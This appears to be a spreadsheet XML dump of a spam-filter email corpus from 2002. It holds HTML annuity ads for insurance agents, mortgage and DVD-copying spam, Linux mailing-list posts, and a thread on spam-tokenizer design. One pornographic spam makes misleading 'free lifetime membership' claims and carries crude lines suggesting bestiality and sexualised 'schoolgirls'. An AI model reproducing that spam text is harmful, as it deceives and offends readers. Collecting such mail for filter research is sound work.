             &amp;#151; or &amp;#151; &lt;/b&gt;&lt;/font&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF"&gt;Please =
 fill out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&lt;img =
 src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jerry_livers@aigannuity.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"AIG Ad Inquiry"&gt;
                           &lt;/b&gt;&lt;/font&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/AIG/ultramyg1/20020516-4.gif" width=3D"535" =
 height=3D"82" alt=3D"AIG Annuity"&gt;&lt;br&gt;
             &lt;font size=3D"1"&gt;&lt;b&gt;For agent use only.&lt;/b&gt;&lt;/font&gt;
           &lt;/td&gt;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size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_14FD9B_01C23266.747F2DA0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 6% Commission on 12 Month "CD-Style" Annuity
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_10C0D9_01C1FDBC.F2389D00
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  The M&amp;O Annuity Guru	 Versus	 The M&amp;O Commissioner	
  ...in Mortal Combat	
  The 12 Month "CD Style" Annuity	
  	 	3.35% Guaranteed	 
  	Great Roll-Over Options	 
  	Issued to Age 85	 
   _____  
  	 	6% Commission Through Age 85	 
  	Earn a $75 to $125 Bonus on Every Paid App... No Limit!	
  	Bonus Offer Expires July 31, 2002	 
 Call or e-mail M&amp;O Marketing &lt;mailto:info@mandomarketing.com&gt;  Today!
  (800) 862-0504
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_10C0D9_01C1FDBC.F2389D00
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;6% Commission on 12 Month "CD-Style" Annuity&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#ffffff" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"4"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-101.gif" =
 width=3D"550" height=3D"64"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-102.gif" =
 width=3D"216" height=3D"191" alt=3D'The M&amp;O Annuity Guru'&gt;&lt;/td&gt;
           &lt;td width=3D"120"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-103.gif" =
 width=3D"120" height=3D"191" alt=3D'Versus'&gt;&lt;/td&gt;
           &lt;td width=3D"214"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-104.gif" =
 width=3D"214" height=3D"191" alt=3D'The M&amp;O Commissioner'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"4"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-105.gif" =
 width=3D"550" height=3D"65" alt=3D'...in Mortal Combat'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"4"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-106.gif" =
 width=3D"550" height=3D"55" alt=3D'The 12 Month "CD Style" =
 Annuity'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"135"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/spacer.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
           &lt;td width=3D"81"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/spacer.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
           &lt;td width=3D"120"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/spacer.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
           &lt;td width=3D"214"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/spacer.gif" width=3D"1" =
 height=3D"1"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"135"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-107.gif" =
 width=3D"135" height=3D"134"&gt;&lt;/td&gt;
           &lt;td colspan=3D"3" align=3D"right"&gt;=20
             &lt;table width=3D"95%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;3.35% Guaranteed&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;Great Roll-Over =
 Options&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;Issued to Age 85&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"4"&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td width=3D"135"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-109.gif" =
 width=3D"135" height=3D"160"&gt;&lt;/td&gt;
           &lt;td colspan=3D"3" align=3D"right"&gt;=20
             &lt;table width=3D"95%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;6% Commission Through Age =
 85&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;Earn a $75 to $125 Bonus on Every Paid =
 App...&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-5.gif" =
 width=3D"108" height=3D"17" align=3D"absbottom" alt=3D"No =
 Limit!"&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"6%" align=3D"right" valign=3D"middle"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-2.gif" =
 width=3D"16" height=3D"18"&gt;&lt;/td&gt;
                 &lt;td width=3D"94%" height=3D"40"&gt;&lt;b&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"4"&gt;Bonus Offer Expires July 31, =
 2002&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"4" align=3D"center"&gt;&lt;br&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;
             Call or e-mail &lt;a =
 href=3D"mailto:info@mandomarketing.com"&gt;M&amp;amp;O Marketing&lt;/a&gt; Today!&lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-3a.gif" =
 width=3D"525" height=3D"84" alt=3D"(800) 862-0504"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#FFFFFF"&gt;Please fill =
 out the form below for more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://63.211.81.87/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@mandomarketing.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"M and O Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img =
 src=3D"http://63.211.81.87/images/mando/mortal/20020510-4.gif" =
 width=3D"327" height=3D"116"&gt;&lt;br&gt;
             &amp;nbsp; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anyone=20
         to receive our mailings who does not wish to. This is =
 professional communication=20
         sent to insurance professionals. To be removed from this mailing =
 list,=20
         &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_10C0D9_01C1FDBC.F2389D00--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Optimizing for Pentium Pt.2
</t>
  </si>
  <si>
    <t xml:space="preserve">gcc, glibc and binutils, which the lfs site says not to optimise,
 already determines what system you're compiling on, and optimises itself
 to that. That's my understanding of how it works anyway.
 John
 Subject: Re: [ILUG] Optimizing for Pentium Pt.2
 On Fri, Jul 26, 2002 at 11:24:30PM +0100, John Gay wrote:
 &gt; A while ago I asked what other packages I should optomize for Pentium.
 &gt; One
 &gt; person answered GlibC. This got me thinking about GCC itself, so I
 asked on
 &gt; another list and got a few answers, most were "don't even think about
 it" but
 &gt; a few suggested GCC and one pointed me to Linux From Scratch.
 why?
 or more specifically, what do you mean?  on one hand you can optimise
 how gcc is compiled.  all that will do is make it generate the exact
 same code just a smidge faster.  and since gcc is such a memory pig,
 you'd do better to buy more ram to up your fs cache hits and to keep
 gcc's heap out of swap.
 on the other side you can look into patches to gcc that affect it's code
 generation.  um, ok, but keep in mind that compiler errors suck. i can't
 express that enough.  compilers should just work.  perfectly. always.
 doing anything that might affect that is, in my opinion, insane. they're
 hard to trace and you'd better have a deep knowledge of what's going on
 to either report bugs to the patch developers or to fix it yourself.
 plus my understanding is that gcc would need major changes to get large
 speed boosts on x86 chips.
 kevin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: zzzz@example.com
</t>
  </si>
  <si>
    <t xml:space="preserve">New Account For: zzzz@example.com
 ##################################################
 #                                                #
 #          Free XXX Links .org is a              #
 #          non-profit organization               #
 #                                                #
 #           Offering the best in                 #
 #       adult entertainment for free.            #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password:
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@example.com
 &gt;&gt;&gt;&gt;&gt;  Password: 818932
 Test it out NOW!   Adults Farm
 http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 6 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 09/05/02
 With just over 3.9 Million Members that signed up for FREE, Last month there were 894,457 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 6 adult membership sites for
 free?
 A. I have advertisers that pay me for ad space so you don't have to pay
 for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 6 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 # 6. &gt; XXX Adults Farm
 http://rd.yahoo.com/*http://80.71.71.88/farm/?aid=818932
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 5. &gt; Sexy Celebes Porn
 http://rd.yahoo.com/*http://80.71.71.88/celebst/?aid=818932
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 4. &gt; Play House Porn
 http://rd.yahoo.com/*http://80.71.71.88/play/?aid=818932
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 3. &gt; Asian Sex Fantasies
 http://rd.yahoo.com/*http://80.71.71.88/asian/?aid=818932
 Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 # 2. &gt; Lesbian Lace
 http://rd.yahoo.com/*http://80.71.71.88/lesbian/?aid=818932
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 # 1. &gt; New! just added today: Mage Porn Site
 http://rd.yahoo.com/*http://80.71.71.88/mega/?aid=818932
 950,00 Pics, 90,000 Movies, Live Sex Shows... FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!
 --------------------------
 Removal Instructions:
 You have received this advertisement because you have opted in to receive free adult internet
 offers and specials through our affiliated websites. If you do not wish to receive further emails
 or have received the email in error you may opt-out of our database here
 http://rd.yahoo.com/*http://80.71.71.88/optout/ . Please allow 24 hours for removal.
 mdnfhmobawljhlqtotlhpikemcywuc
</t>
  </si>
  <si>
    <t xml:space="preserve">[Tim]
 &gt; Another area for potentially fruitful study:  it's clear that the
 &gt; highest-value indicators usually appear "early" in msgs, and for spam
 &gt; there's an actual reason for that:  advertising has to strive
 &gt; to get your attention early.  So, for example, if we only bothered to
 &gt; tokenize the first 90% of a msg, would results get worse?
 [Neil Schemenauer]
 &gt; Spammers could exploit this including a large MIME part at the beginning
 &gt; of the message.  In pratice that would probably work fine.
 Note that timtest.py's current tokenizer only looks at decoded text/* MIME
 sections (or raw message text if no MIME exists); spammers could put
 megabytes of other crap before that and it wouldn't even be looked at
 (except that the email package has to parse non-text/* parts well enough to
 skip over them, and tokens for the most interesting parts of Content-{Type,
 Disposition, Transfer-Encoding} decorations are generated for all MIME
 sections).
 Schemes that remain ignorant of MIME are vulnerable to spammers putting
 arbitrary amounts of "nice text" in the preamble area (after the headers and
 before the first MIME section), which most mail readers don't display, but
 which appear first in the file so are latched on to by Graham's scoring
 scheme.
 But I don't worry about clever spammers -- I've seen no evidence that they
 exist &lt;0.5 wink&gt;.  Even if they do, the Open Source zoo is such that no
 particular scheme will gain dominance, and there's no percentage for
 spammers in trying to fool just one scheme.  Even if they did, for the kind
 of scheme we're using here they can't *know* what "nice text" is, not unless
 they pay a lot of attention to the spam targets and highly tailor their
 messages to each different one.  At that point they'd be doing targeted
 marketing, and the cost of the game to them would increase enormously.
 if-you're-out-to-make-a-quick-buck-you-don't-waste-a-second-on-hard-
     targets-ly y'rs  - tim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Copy DVD's to regular CD-R discs and watch on your DVD Player.d7l7
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Below is the result of your feedback form.  It was submitted by
  (oceandrive@email.is) on Sunday, July 21, 2002 at 12:29:29
 ---------------------------------------------------------------------------
 : Why Spend upwards of $4000 on a DVD Burner when we will show you an alternative that will do the exact same thing for just a fraction of the cost? Copy your DVD's NOW. Best Price on the net. Click here: http://005@www.dvdcopyxp.com/cgi-bin/enter.cgi?marketing_id=dcx007 Click to remove http://005@www.spambites.com/cgi-bin/enter.cgi?spambytes_id=100115 
 ---------------------------------------------------------------------------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</si>
  <si>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Refinance or MortgageFKZQELJHYNO
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY text=3D#000000 bgColor=3D#ffffff&gt;&lt;DIV align=3Dcent=
 er&gt;&lt;TABLE borderColor=3D#0066cc cellSpacing=3D0 cellPadding=3D0 width=3D69=
 0 border=3D1&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D0 width=3D=
 686 border=3D0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop bgColor=3D#0066cc height=3D35&gt;&lt;=
 FONT color=3D#66ccff size=3D5&gt;&lt;FONT face=3DArial&gt;&lt;B&gt;What a Loan From &amp;nbsp=
 ;&lt;/B&gt;&lt;SPAN class=3D432060115-12052002&gt;&lt;FONT color=3D#0000ff size=3D2&gt;&amp;nbsp=
 ;&lt;B&gt;&lt;FONT color=3D#66ccff size=3D5&gt;Lenders&lt;/FONT&gt;&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;=
 /FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop bgColor=3D#66ccff height=3D40&gt;=
 &lt;DIV align=3Dright&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D7&gt;&lt;B=
 &gt;&lt;FONT color=3D#0066cc size=3D6&gt;Can Do For You:&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;/=
 B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD vAlign=3Dtop height=3D280&gt;&lt;DIV align=3Dce=
 nter&gt;&lt;P&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=3D#0066=
 cc size=3D5&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT color=3D#0066cc size=3D6&gt;Rates Have Never Bee=
 n Lower!!&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;DIV align=3Dcenter&gt;&lt;P&gt;&lt;FONT face=3D"=
 Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=3D#0066cc size=3D5&gt;Lowest Rat=
 es - Best Possible Terms&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;DIV align=3Dcenter&gt;&lt;T=
 ABLE cellSpacing=3D0 cellPadding=3D0 width=3D98% border=3D0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD=
  colSpan=3D2&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;A href=3Dhttp=
 ://www.wannaberich.net/mortgage/&gt;DEBT CONSOLIDATION&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD=
  width=3D41% rowSpan=3D12&gt;&lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=3D2=
 62 border=3D0&gt;&lt;TBODY&gt;&lt;TR&gt;&lt;TD colSpan=3D3&gt;&lt;DIV align=3Dcenter&gt;&lt;FONT face=3D=
 "Arial, Helvetica, sans-serif"&gt;&lt;B&gt;&lt;FONT color=3D#0066cc size=3D5&gt;CHANGE TH=
 IS...&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD width=3D90&gt;&lt;B&gt;&lt;FONT face=3D=
